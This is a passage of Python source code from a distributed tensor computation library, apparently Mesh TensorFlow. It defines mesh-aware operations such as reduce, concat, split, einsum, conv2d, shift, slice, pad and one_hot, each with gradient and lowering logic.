[reduce_sum(grad_ys[0], output_shape=self.inputs[0].shape)]\n\n def lower(self, lowering):\n ret = lowering.mesh_impl(self).broadcast_impl(\n lowering.tensors[self.inputs[0]], self.inputs[0].shape,\n self.outputs[0].shape)\n lowering.set_tensor_lowering(self.outputs[0], ret)\n\n\ndef broadcast(x, new_shape):\n return BroadcastOperation(x, new_shape).outputs[0]\n\n\ndef _reduce_helper(input_shape,\n output_shape,\n input_tensor_layout,\n reduction_fn_string=\"SUM\"):\n \"\"\"Returns slicewise function and reduced mesh dimensions.\n\n Args:\n input_shape: a Shape\n output_shape: a Shape\n input_tensor_layout: a TensorLayout\n reduction_fn_string: \"SUM\" or \"MAX\"\n Returns:\n reduce_slice_fn: a function from tf.Tensor to tf.Tensor\n reduced_mesh_axes: a list of integers\n \"\"\"\n reduce_dims_indices = [\n i for i, d in enumerate(input_shape.dims) if d not in output_shape.dims]\n reduced_input_shape = Shape([\n d for d in input_shape.dims if d in output_shape.dims])\n perm = [reduced_input_shape.dims.index(d) for d in output_shape.dims]\n def reduce_slice_fn(xslice):\n ret = xslice\n if reduce_dims_indices:\n ret = reduction_fn(reduction_fn_string)(xslice, reduce_dims_indices)\n if perm != list(xrange(len(perm))):\n ret = tf.transpose(ret, perm)\n return ret\n reduced_mesh_axes = []\n for i in reduce_dims_indices:\n mesh_axis = input_tensor_layout[i]\n if mesh_axis is not None:\n reduced_mesh_axes.append(mesh_axis)\n return reduce_slice_fn, reduced_mesh_axes\n\n\nclass ReduceOperation(Operation):\n \"\"\"Reduction - output dims are a subset of input dims, in any order.\"\"\"\n\n def __init__(self, x, output_shape, reduction_fn_string, name=None):\n super(ReduceOperation, self).__init__([x], name=name or \"reduce\")\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n self._reduction_fn_string = reduction_fn_string\n\n def gradient(self, grad_ys):\n if self._reduction_fn_string == \"SUM\":\n return [broadcast(grad_ys[0], self.inputs[0].shape)]\n elif (self._reduction_fn_string == \"MAX\" or\n self._reduction_fn_string == \"MIN\"):\n return [cast(equal(self.inputs[0], self.outputs[0]), self.inputs[0].dtype)\n * grad_ys[0]]\n else:\n raise ValueError(\"Gradients to other reductions not implemented\")\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n slicewise_fn, reduced_mesh_axes = _reduce_helper(\n self.inputs[0].shape, self.outputs[0].shape,\n mesh_impl.tensor_layout(self.inputs[0]),\n self._reduction_fn_string)\n y = mesh_impl.slicewise(slicewise_fn, lowering.tensors[self.inputs[0]])\n if reduced_mesh_axes:\n def add_counter_fn():\n lowering.add_counter(\"allreduce/%s/reduce_op\" % reduced_mesh_axes,\n lowering.laid_out_size(self.outputs[0]))\n if self._reduction_fn_string == \"SUM\":\n y = LazyAllreduceSum(\n mesh_impl, y, reduced_mesh_axes, add_counter_fn=add_counter_fn)\n else:\n y = mesh_impl.allreduce(\n y, reduced_mesh_axes, self._reduction_fn_string)\n add_counter_fn()\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass ConcatOperation(Operation):\n \"\"\"tf.concat.\n\n All inputs have the same shape, except for the size of the dimension named\n dim_name.\n \"\"\"\n\n def __init__(self, xs, concat_dim_name, name=None):\n super(ConcatOperation, self).__init__(xs, name=name or \"concat\")\n # verify that the shapes are all compatible\n dim_names = [dim.name for dim in xs[0].shape.dims]\n self._concat_dim_name = concat_dim_name\n\n if concat_dim_name not in dim_names:\n raise ValueError(\"xs[0] does not contain a dimension named dim_name\")\n self._axis = dim_names.index(concat_dim_name)\n\n should_be_equal = [\n x.shape.resize_dimension(concat_dim_name, 0) for x in xs]\n if not all(s == should_be_equal[0] for s in should_be_equal):\n raise ValueError(\"shapes are not compatible %s\" % xs)\n\n self._input_sizes = [x.shape.dims[self._axis].size for x in xs]\n output_size = sum(self._input_sizes)\n self._outputs = [\n Tensor(self, xs[0].shape.resize_dimension(concat_dim_name, output_size),\n xs[0].dtype)]\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return split(dy, self.outputs[0].shape.dims[self._axis], self._input_sizes)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(\n Dimension(self._concat_dim_name, 0)) is not None:\n raise ValueError(\"can't concat along split axis\")\n def slicewise_fn(*args):\n return tf.concat(args, axis=self._axis, name=\"concat\")\n y = mesh_impl.slicewise(\n slicewise_fn, *[lowering.tensors[x] for x in self._inputs])\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\ndef concat(xs, concat_dim_name, name=None):\n \"\"\"Like tf.concat.\n\n All inputs must have equal shape except for the sizes in the concatenated\n dimension. The dimension names should be the same, even that of the\n concatenated dimension.\n\n Args:\n xs: a list of Tensors\n concat_dim_name: a string\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n return ConcatOperation(xs, concat_dim_name, name).outputs[0]\n\n\nclass SplitOperation(Operation):\n \"\"\"like tf.split.\n\n TODO(noam, nikip): this code has never been run. Run it and test it.\n \"\"\"\n\n def __init__(self, x, split_dim, num_or_size_splits, name=None):\n super(SplitOperation, self).__init__([x], name=name or \"concat\")\n\n self._split_dim = split_dim\n if split_dim not in x.shape.dims:\n raise ValueError(\"%s does not contain dimension %s\" % (x, split_dim))\n self._axis = x.shape.dims.index(split_dim)\n\n if isinstance(num_or_size_splits, list):\n self._output_sizes = num_or_size_splits\n if sum(num_or_size_splits) != split_dim.size:\n raise ValueError(\n \"Sizes do not add up %s %s\" % (num_or_size_splits, split_dim))\n else:\n assert isinstance(num_or_size_splits, int)\n assert split_dim.size % num_or_size_splits == 0\n self._output_sizes = (\n [split_dim.size / num_or_size_splits] * num_or_size_splits)\n\n self._outputs = [\n Tensor(self, x.shape.resize_dimension(split_dim.name, output_size),\n x.dtype) for output_size in self._output_sizes]\n\n def gradient(self, grad_ys):\n return concat(grad_ys, self._split_dim.name)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._split_dim) is not None:\n raise ValueError(\"can't split along split axis\")\n def slicewise_fn(x):\n # Since we return a tuple of tf.Tensor, slicewise will collate the\n # outputs and return a tuple of LaidOutTensors.\n return tuple(tf.split(x, self._output_sizes, axis=self._axis))\n values = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[self.inputs[0]])\n for t, v in zip(self._outputs, values):\n lowering.set_tensor_lowering(t, v)\n\n\ndef split(x, split_dim, num_or_size_splits, name=None):\n \"\"\"Like tf.split.\n\n Args:\n x: a Tensor\n split_dim: a Dimension in x.shape.dims\n num_or_size_splits: either an integer dividing split_dim.size\n or a list of integers adding up to split_dim.size\n name: an optional string\n Returns:\n a list of Tensors.\n \"\"\"\n return SplitOperation(x, split_dim, num_or_size_splits, name=name).outputs\n\n\nclass StackOperation(Operation):\n \"\"\"Like tf.stack.\"\"\"\n\n def __init__(self, xs, dim_name, axis, name=None):\n super(StackOperation, self).__init__(xs, name=name or \"stack\")\n self._axis = axis\n self._new_dim = Dimension(dim_name, len(xs))\n input_shape = xs[0].shape\n for x in xs:\n if x.shape != xs[0].shape:\n raise ValueError(\n \"inputs to stack must have the same shape, got %s\" % xs)\n output_shape = Shape(\n input_shape.dims[:axis] + [self._new_dim]+ input_shape.dims[axis:])\n self._outputs = [Tensor(self, output_shape, xs[0].dtype)]\n\n def gradient(self, grad_ys):\n return unstack(grad_ys[0], self._new_dim)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._new_dim) is not None:\n raise ValueError(\"can't stack along split axis\")\n inputs = [lowering.tensors[t] for t in self._inputs]\n def slicewise_fn(*args):\n return tf.stack(args, axis=self._axis)\n ret = mesh_impl.slicewise(slicewise_fn, *inputs)\n lowering.set_tensor_lowering(self.outputs[0], ret)\n\n\ndef stack(xs, dim_name, axis, name=None):\n \"\"\"Stack multiple Tensors to make a new dimension.\n\n Args:\n xs: a list of Tensors with identical shapes.\n dim_name: a string (name of the new dimension)\n axis: an integer (index of the new dimension in the output shape)\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n ret = StackOperation(xs, dim_name, axis, name).outputs[0]\n return ret\n\n\nclass UnstackOperation(Operation):\n \"\"\"Split into multiple Tensors, eliminating a dimension.\"\"\"\n\n def __init__(self, x, dim, name=None):\n super(UnstackOperation, self).__init__([x], name=name or \"unstack\")\n self._dim = dim\n self._axis = x.shape.dims.index(dim)\n output_shape = x.shape - dim\n self._outputs = [\n Tensor(self, output_shape, x.dtype) for _ in xrange(dim.size)]\n\n def gradient(self, grad_ys):\n return [stack(grad_ys, self._dim.name, self._axis)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._dim) is not None:\n raise ValueError(\"can't unstack along split axis\")\n def slicewise_fn(x):\n return tuple(tf.unstack(x, num=self._dim.size, axis=self._axis))\n output_values = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[self._inputs[0]])\n for t, v in zip(self.outputs, list(output_values)):\n lowering.set_tensor_lowering(t, v)\n\n\ndef unstack(x, dim, name=None):\n \"\"\"Split into multiple Tensors, eliminating a dimension.\n\n Args:\n x: a Tensor\n dim: a Dimension\n name: an optional string\n\n Returns:\n a list of dim.size Tensors, each with shape (x.shape - dim)\n \"\"\"\n return UnstackOperation(x, dim, name).outputs\n\n\ndef cumsum(x, dim, exclusive=False):\n \"\"\"Cumulative sum.\n\n Args:\n x: a Tensor\n dim: a Dimension\n exclusive: a boolean\n\n Returns:\n a Tensor with the same shape as x.\n \"\"\"\n new_name = \"tmp_dim_cumsum\"\n new_dim = Dimension(new_name, dim.size)\n new_shape = x.shape.rename_dimension(dim.name, new_name)\n comparator = less if exclusive else less_equal\n m = cast(\n comparator(range(x.mesh, dim, dtype=tf.float32),\n range(x.mesh, new_dim, dtype=tf.float32)), x.dtype)\n ret = einsum([x, m], output_shape=new_shape)\n return reshape(ret, x.shape)\n\n\ndef _einsum_helper(input_shapes, output_shape, mesh_impl):\n \"\"\"Returns slicewise function and reduced mesh dimensions.\n\n Assumes the output shape contains no new dimensions.\n\n Args:\n input_shapes: a list of Shapes\n output_shape: a Shape\n mesh_impl: a MeshImpl\n Returns:\n einsum_slice_fn: a function from tf.Tensors to tf.Tensor\n reduced_mesh_axes: a list of integers\n \"\"\"\n input_shape_union = _shape_union(input_shapes)\n total_num_dims = input_shape_union.ndims\n # list of input shapes that contain all dimensions.\n full_shapes = [\n s for s in input_shapes + [output_shape] if s.ndims == total_num_dims]\n full_shape = full_shapes[0] if full_shapes else input_shape_union\n reduce_slice_fn, reduced_mesh_axes = _reduce_helper(\n full_shape, output_shape, mesh_impl.tensor_layout(full_shape))\n def einsum_slice_fn_naive(*slices):\n # naive einsum implementation where we broadcst all inputs to the full\n # shape, multiply componentwise, then reduce.\n return reduce_slice_fn(reduce(tf.multiply, [\n _expand_dims(x, input_shape, full_shape)\n for x, input_shape in zip(slices, input_shapes)]))\n if full_shapes:\n # it is not wasteful of space to broadcast fully and then reduce.\n # this helps to avoid some inefficient GPU implementations.\n einsum_slice_fn = einsum_slice_fn_naive\n else:\n # call tf.einsum\n equation = _einsum_equation(input_shapes, output_shape)\n def einsum_slice_fn(*slices):\n if slices[0].dtype.is_floating:\n return tf.einsum(equation, *slices)\n else:\n return einsum_slice_fn_naive(*slices)\n return einsum_slice_fn, reduced_mesh_axes\n\n\nclass EinsumOperation(Operation):\n \"\"\"Einstein summation (matmul, etc).\n\n The equation follows the dimensions in the input and output shapes.\n\n Every dimension must occur in at least two of the input/output Tensors.\n i.e. no new dimensions in the output, and no reduction of dimensions that\n occur in only one input.\n \"\"\"\n\n def __init__(self, inputs, output_shape, name=None):\n super(EinsumOperation, self).__init__(inputs, name=name or \"einsum\")\n if not inputs:\n raise ValueError(\"Einsum needs at least one input\")\n for x in inputs:\n if x.dtype != inputs[0].dtype:\n raise ValueError(\"Input dtypes must be equal\")\n self._outputs = [Tensor(self, output_shape, inputs[0].dtype)]\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n xs = self.inputs\n return [\n einsum([dy] + [xs[j] for j in xrange(len(xs)) if j != i], xs[i].shape)\n for i in xrange(len(self.inputs))]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n xs = self.inputs\n input_shape_set = set(sum([x.shape.dims for x in xs], []))\n output_shape = self.outputs[0].shape\n intersection_shape = Shape(\n [d for d in output_shape.dims if d in input_shape_set])\n einsum_slice_fn, reduced_mesh_axes = _einsum_helper(\n [x.shape for x in self.inputs], intersection_shape, mesh_impl)\n y = mesh_impl.slicewise(\n einsum_slice_fn, *[lowering.tensors[x] for x in self.inputs])\n if reduced_mesh_axes:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/einsum_op\" % reduced_mesh_axes,\n mesh_impl.laid_out_size(intersection_shape))\n y = LazyAllreduceSum(\n mesh_impl, y, reduced_mesh_axes, add_counter_fn=add_counter_fn)\n # broadcast from intersection_shape to output_shape\n if intersection_shape != output_shape:\n y = mesh_impl.broadcast_impl(y, intersection_shape, output_shape)\n lowering.set_tensor_lowering(self.outputs[0], y)\n computation_shape = Shape(list(input_shape_set))\n lowering.add_counter(\"einsum\", mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\"einsum_unique\", computation_shape.size)\n\n\nclass Conv2dOperation(Operation):\n \"\"\"like tf.nn.conv2d.\n\n Always data format \"NHWC\".\n # TODO(nikip): support dilations\n Always dilation rate of 1\n padding: \"SAME\" or \"VALID\"\n\n TODO(noam): implement more options.\n \"\"\"\n\n def __init__(self, conv_input, conv_filter, strides, padding, name=None):\n super(Conv2dOperation, self).__init__(\n [conv_input, conv_filter], name=name or \"conv2d\")\n self._padding = padding\n self._batch_dims = conv_input.shape.dims[:-3]\n self._in_h_dim, self._in_w_dim, self._in_dim = conv_input.shape.dims[-3:]\n self._fh_dim, self._fw_dim = conv_filter.shape.dims[:2]\n f_in_dim, self._out_dim = conv_filter.shape.dims[2:]\n if f_in_dim != self._in_dim:\n raise ValueError(\"Dimensions do not match input=%s filter=%s\"\n % (conv_input, conv_filter))\n out_h = self._in_h_dim.size\n out_w = self._in_w_dim.size\n if padding == \"VALID\":\n out_h -= (self._fh_dim.size - 1)\n out_w -= (self._fw_dim.size - 1)\n\n self._strides = strides\n if strides is not None:\n out_h //= strides[1]\n out_w //= strides[2]\n self._out_h_dim = Dimension(self._in_h_dim.name, out_h)\n self._out_w_dim = Dimension(self._in_w_dim.name, out_w)\n output_shape = Shape(\n self._batch_dims + [self._out_h_dim, self._out_w_dim, self._out_dim])\n self._outputs = [Tensor(self, output_shape, conv_input.dtype)]\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n conv_input, conv_filter = self.inputs\n return [\n conv2d_backprop_input(self._inputs[0].shape,\n conv_filter,\n dy,\n self._strides,\n self._padding),\n conv2d_backprop_filter(conv_input,\n self._inputs[1].shape,\n dy,\n self._strides,\n self._padding)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n conv_input, conv_filter = self.inputs\n if mesh_impl.tensor_dimension_to_mesh_axis(self._in_h_dim) is not None:\n raise ValueError(\"can't slice along dimension h\")\n if mesh_impl.tensor_dimension_to_mesh_axis(self._in_w_dim) is not None:\n raise ValueError(\"can't slice along dimension w\")\n if mesh_impl.tensor_dimension_to_mesh_axis(self._fh_dim) is not None:\n raise ValueError(\"can't slice along dimension fh\")\n if mesh_impl.tensor_dimension_to_mesh_axis(self._fw_dim) is not None:\n raise ValueError(\"can't slice along dimension fw\")\n def tf_fn(tf_input, tf_filter):\n output = tf.nn.conv2d(\n _tf_flatten_batch_dims(tf_input, 3),\n tf_filter, self._strides, self._padding)\n return _tf_restore_batch_dims(output, 3, tf_input)\n y = mesh_impl.slicewise(\n tf_fn, lowering.tensors[conv_input], lowering.tensors[conv_filter])\n # reducing out input channels - may need to allreduce\n in_mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(self._in_dim)\n if in_mesh_axis is not None:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/conv2d_op\" % [in_mesh_axis],\n mesh_impl.laid_out_size(self.outputs[0].shape))\n y = LazyAllreduceSum(mesh_impl, y, [in_mesh_axis], add_counter_fn)\n lowering.set_tensor_lowering(self.outputs[0], y)\n computation_shape = _shape_union([conv_filter.shape, self.outputs[0].shape])\n lowering.add_counter(\"conv2d/forward\",\n mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\"conv2d_unique/forward\", computation_shape.size)\n\n\ndef conv2d(conv_input, conv_filter, strides, padding, name=None):\n \"\"\"conv2d.\"\"\"\n return Conv2dOperation(\n conv_input, conv_filter, strides, padding, name=name).outputs[0]\n\n\nclass Conv2dBackpropInputOperation(Operation):\n \"\"\"like tf.nn.conv2d_backprop_input\"\"\"\n\n def __init__(self, input_shape, conv_filter, dy, strides, padding, name=None):\n super(Conv2dBackpropInputOperation, self).__init__(\n [dy, conv_filter], name=name or \"conv2d_backprop\")\n self._padding = padding\n self._strides = strides\n self._input_shape = input_shape\n self._outputs = [Tensor(self, input_shape, dy.dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n dy, conv_filter = self.inputs\n input_sizes = mesh_impl.slice_shape(self.outputs[0].shape)\n input_sizes = [list_product(input_sizes[:-3])] + input_sizes[-3:]\n def tf_fn(tf_dy, tf_filter):\n return _tf_restore_batch_dims(\n tf.nn.conv2d_backprop_input(\n input_sizes, tf_filter, _tf_flatten_batch_dims(tf_dy, 3),\n self._strides, self._padding), 3, tf_dy)\n dx = mesh_impl.slicewise(\n tf_fn, lowering.tensors[dy], lowering.tensors[conv_filter])\n # reducing out output channels - may need to allreduce\n out_mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(dy.shape.dims[-1])\n if out_mesh_axis is not None:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/conv2d_op\" % [out_mesh_axis],\n mesh_impl.laid_out_size(self.outputs[0].shape))\n dx = LazyAllreduceSum(mesh_impl, dx, [out_mesh_axis], add_counter_fn)\n lowering.set_tensor_lowering(self.outputs[0], dx)\n computation_shape = _shape_union([conv_filter.shape, dy.shape])\n lowering.add_counter(\"conv2d/backprop_input\",\n mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\"conv2d_unique/backprop_input\", computation_shape.size)\n\n\ndef conv2d_backprop_input(input_shape,\n conv_filter,\n dy,\n strides,\n padding, name=None):\n return Conv2dBackpropInputOperation(input_shape,\n conv_filter,\n dy,\n strides,\n padding,\n name=name).outputs[0]\n\n\nclass Conv2dBackpropFilterOperation(Operation):\n \"\"\"like tf.nn.conv2d_backprop_input\"\"\"\n\n def __init__(self, conv_input, filter_shape, dy, strides, padding, name=None):\n super(Conv2dBackpropFilterOperation, self).__init__(\n [conv_input, dy], name=name or \"conv2d_backprop_filter\")\n self._padding = padding\n self._strides = strides\n self._filter_shape = filter_shape\n self._outputs = [Tensor(self, filter_shape, dy.dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n conv_input, dy = self.inputs\n filter_sizes = mesh_impl.slice_shape(self.outputs[0].shape)\n def tf_fn(tf_input, tf_dy):\n return tf.nn.conv2d_backprop_filter(\n _tf_flatten_batch_dims(tf_input, 3), filter_sizes,\n _tf_flatten_batch_dims(tf_dy, 3), self._strides, self._padding)\n df = mesh_impl.slicewise(\n tf_fn, lowering.tensors[conv_input], lowering.tensors[dy])\n\n # reducing out batch dimensions - may need to allreduce\n reduced_mesh_axes = [\n mesh_impl.tensor_dimension_to_mesh_axis(d)\n for d in dy.shape.dims[:-3]]\n reduced_mesh_axes = [a for a in reduced_mesh_axes if a is not None]\n\n if reduced_mesh_axes:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/conv2d_backprop_filter\" % (reduced_mesh_axes,),\n mesh_impl.laid_out_size(self.outputs[0].shape))\n df = LazyAllreduceSum(mesh_impl, df, reduced_mesh_axes, add_counter_fn)\n\n lowering.set_tensor_lowering(self.outputs[0], df)\n computation_shape = _shape_union([self.outputs[0].shape, dy.shape])\n lowering.add_counter(\"conv2d/backprop_filter\",\n mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\n \"conv2d_unique/backprop_filter\", computation_shape.size)\n\n\ndef conv2d_backprop_filter(conv_input,\n filter_shape,\n dy,\n strides,\n padding, name=None):\n return Conv2dBackpropFilterOperation(conv_input,\n filter_shape,\n dy,\n strides,\n padding,\n name=name).outputs[0]\n\n\nclass ShiftOperation(Operation):\n \"\"\"Shift by a static offset in one dimension.\"\"\"\n\n def __init__(self, x, offset, dim, wrap, name=None):\n \"\"\"Create a shift operation.\n\n Shift x right by +offset in dimension dim.\n If offset is negative, shift left.\n If wrap is true then wrap-around. Else, pad with zeros.\n\n Args:\n x: a Tensor\n offset: an integer\n dim: a Dimension of x\n wrap: a boolean - whether to wrap or pad.\n name: an optional string\n \"\"\"\n super(ShiftOperation, self).__init__([x], name=name or \"shift\")\n self._dim = dim\n self._axis = x.shape.dims.index(dim)\n self._offset = offset\n self._wrap = wrap\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n\n def gradient(self, grad_ys):\n return [shift(grad_ys[0], -self._offset, self._dim, self._wrap)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(self._dim)\n inputs = self._inputs[0]\n ndims = self._inputs[0].shape.ndims\n axis = self._axis\n dim = self._dim\n lowered_x = lowering.tensors[inputs]\n def my_slice(x, start, size):\n begin = [0] * axis + [start] + [0] * (ndims - axis - 1)\n size = [-1] * axis + [size] + [-1] * (ndims - axis - 1)\n return tf.slice(x, begin, size)\n if mesh_axis is None:\n def slicewise_fn(x):\n \"\"\"Slicewise function.\"\"\"\n def my_pad(s, begin_pad, end_pad):\n paddings = ([[0, 0]] * axis + [[begin_pad, end_pad]]\n + [[0, 0]] * (ndims - axis - 1))\n return tf.pad(s, paddings)\n if self._wrap:\n offset = self._offset % dim.size\n return tf.concat([my_slice(x, dim.size - offset, offset),\n my_slice(x, 0, dim.size - offset)], axis=axis)\n elif self._offset > 0:\n return my_pad(\n my_slice(x, 0, dim.size - self._offset), self._offset, 0)\n else:\n neg_offset = -self._offset\n return my_pad(\n my_slice(x, neg_offset, dim.size - neg_offset), 0, neg_offset)\n lowered_y = mesh_impl.slicewise(slicewise_fn, lowered_x)\n else:\n mesh_dim_size = mesh_impl.shape.dims[mesh_axis].size\n tensor_dim_size = self._dim.size\n block_size = tensor_dim_size // mesh_dim_size\n odiv = self._offset // block_size\n omod = self._offset % block_size\n laid_out_size = mesh_impl.laid_out_size(inputs.shape)\n if omod == 0:\n # shift by an integral number of processors.\n lowered_y = mesh_impl.shift_by_n_processors(\n lowered_x, mesh_axis, odiv, self._wrap)\n lowering.add_counter(\"shift[%d]\" % odiv, laid_out_size)\n else:\n # shift by odiv processors + omod positions\n sliced = mesh_impl.slicewise(\n lambda x: my_slice(x, 0, block_size - omod), lowered_x)\n second_part = mesh_impl.shift_by_n_processors(\n sliced, mesh_axis, odiv, self._wrap)\n lowering.add_counter(\n \"shift[%d]\" % odiv,\n laid_out_size * (block_size - omod) // block_size)\n sliced = mesh_impl.slicewise(\n lambda x: my_slice(x, block_size - omod, omod), lowered_x)\n first_part = mesh_impl.shift_by_n_processors(\n sliced, mesh_axis, odiv + 1, self._wrap)\n lowered_y = mesh_impl.slicewise(\n lambda a, b: tf.concat([a, b], axis), first_part, second_part)\n lowering.add_counter(\n \"shift[%d]\" % (odiv + 1), laid_out_size * omod // block_size)\n lowering.set_tensor_lowering(self.outputs[0], lowered_y)\n\n\ndef shift(x, offset, dim, wrap, name=None):\n \"\"\"Shift operation.\n\n Shift x right by +offset in dimension dim.\n\n Args:\n x: a Tensor\n offset: an integer. If negative, shift left instead of right.\n dim: a Dimension of x\n wrap: a boolean - whether to wrap (True) or pad with zeros (False).\n name: an optional string\n\n Returns:\n a Tensor with the same shape and dtype as x\n \"\"\"\n return ShiftOperation(x, offset, dim, wrap, name=name).outputs[0]\n\n\nclass SliceOperation(Operation):\n \"\"\"tf.slice.\n\n We support the slice operation along one axis. Similar to tf.slice, specify\n the begin and size values for the slice_dim.\n \"\"\"\n\n def __init__(self, x, begin, size, slice_dim_name, name=None):\n super(SliceOperation, self).__init__([x], name=name or \"slice\")\n dim_names = x.shape.dimension_names\n self._axis = axis = dim_names.index(slice_dim_name)\n self._begin = begin\n self._slice_dim = Dimension(slice_dim_name, size)\n input_shape = self._inputs[0].shape\n output_shape = Shape(\n input_shape.dims[:axis] + [self._slice_dim] + input_shape.dims[axis+1:])\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n\n def gradient(self, grad_ys):\n actual_size = self._inputs[0].shape.dims[self._axis].size\n return [\n pad(grad_ys[0],\n [self._begin, actual_size - self._slice_dim.size - self._begin],\n self._slice_dim.name)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._slice_dim) is not None:\n raise ValueError(\"can't slice along split axis\")\n inputs = self._inputs[0]\n ndims = self._inputs[0].shape.ndims\n axis = self._axis\n begin = [0] * axis + [self._begin] + [0] * (ndims - axis - 1)\n size = [-1] * axis + [self._slice_dim.size] + [-1] * (ndims - axis - 1)\n\n def slicewise_fn(x, begin, size):\n return tf.slice(x, begin, size, name=\"slice\")\n y = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[inputs], begin, size)\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass PadOperation(Operation):\n \"\"\"tf.pad.\n\n Similar to tf.pad but we only pad along one axis given by pad_dim_name\n with values specified by paddings. paddings is a list of two\n values, giving the padding value before and after pad_dim.\n \"\"\"\n\n def __init__(self, x, paddings, pad_dim_name, name=None):\n super(PadOperation, self).__init__([x], name=name or \"pad\")\n assert len(paddings) == 2\n input_shape = self._inputs[0].shape\n dim_names = [dim.name for dim in x.shape.dims]\n if pad_dim_name not in dim_names:\n raise ValueError(\"Padding dim name %s not found in input.\" % pad_dim_name)\n self._paddings = paddings\n self._axis = axis = dim_names.index(pad_dim_name)\n output_size = input_shape.dims[axis].size + sum(paddings)\n self._output_dim = Dimension(pad_dim_name, output_size)\n output_shape = Shape(\n input_shape.dims[:axis] +\n [self._output_dim] + input_shape.dims[axis+1:])\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n\n def gradient(self, grad_ys):\n slice_dim_name = self._output_dim.name\n slice_size = self._inputs[0].shape.dims[self._axis].size\n return [slice(grad_ys[0], self._paddings[0], slice_size, slice_dim_name)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._output_dim) is not None:\n raise ValueError(\"can't pad along split axis\")\n inputs = self._inputs[0]\n ndims = self._inputs[0].shape.ndims\n axis = self._axis\n paddings = [[0, 0]] * axis + [self._paddings] + [[0, 0]]* (ndims - axis - 1)\n\n def slicewise_fn(x, paddings):\n return tf.pad(x, paddings, name=\"pad\")\n y = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[inputs], paddings)\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass OneHotOperation(Operation):\n \"\"\"one_hot.\n \"\"\"\n\n def __init__(self, indices, output_dim, on_value, off_value, dtype,\n name=None):\n super(OneHotOperation, self).__init__([indices], name=name or \"one_hot\")\n if not indices.dtype.is_integer:\n raise ValueError(\"indices requires an integer dtype got %s\" % indices)\n self._output_dim = output_dim\n self._on_value = on_value\n self._off_value = off_value\n self._dtype = dtype\n output_shape = Shape(indices.shape.dims + [output_dim])\n self._outputs = [Tensor(self, output_shape, dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n indices = self.inputs[0]\n output_shape = self.outputs[0].shape\n output_slice_shape = mesh_impl.slice_shape(output_shape)\n mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(self._output_dim)\n depth = output_slice_shape[-1]\n if mesh_axis is None:\n offset = 0\n else:\n offset = mesh_impl.slicewise(\n tf.multiply, mesh_impl.laid_out_pcoord(mesh_axis), depth)\n\n def slicewise_fn(indices_slice, offset):\n return tf.one_hot(indices_slice - offset,\n depth,\n on_value=tf.cast(self._on_value, self._dtype),\n off_value=tf.cast(self._off_value, self._dtype),\n dtype=self._dtype)\n y = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[indices], offset)\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass ImportOperation(Operation):\n \"\"\"Import a tf.Tensor onto a mesh.\"\"\"\n\n def __init__(self, mesh, tf_tensor, shape, name=None):\n super(ImportOperation, self).__init__([], mesh=mesh, name=name or \"import\")\n self._outputs = [Tensor(self, shape, tf_tensor.dtype)]\n self._tf_tensor = tf_tensor\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.import_tf_tensor(self.outputs[0], self._tf_tensor))\n\n\ndef anonymous_shape(shape):\n shape = convert_to_shape(shape)\n return Shape([Dimension(\"_anonymous_%i\" % i, d.size)\n for i, d in enumerate(shape)])\n\n\ndef anonymize(x):\n return reshape(x, anonymous_shape(x.shape))\n\n\ndef import_tf_tensor(mesh, tf_tensor, shape=None, name=None):\n tf_tensor = tf.convert_to_tensor(tf_tensor)\n if shape is None:\n shape = Shape([])\n assert not tf_tensor.shape.as_list()\n return ImportOperation(\n mesh, tf_tensor, convert_to_shape(shape), name=name).outputs[0]\n\n\ndef import_fully_replicated(mesh, tf_tensor, shape, name=None):\n return 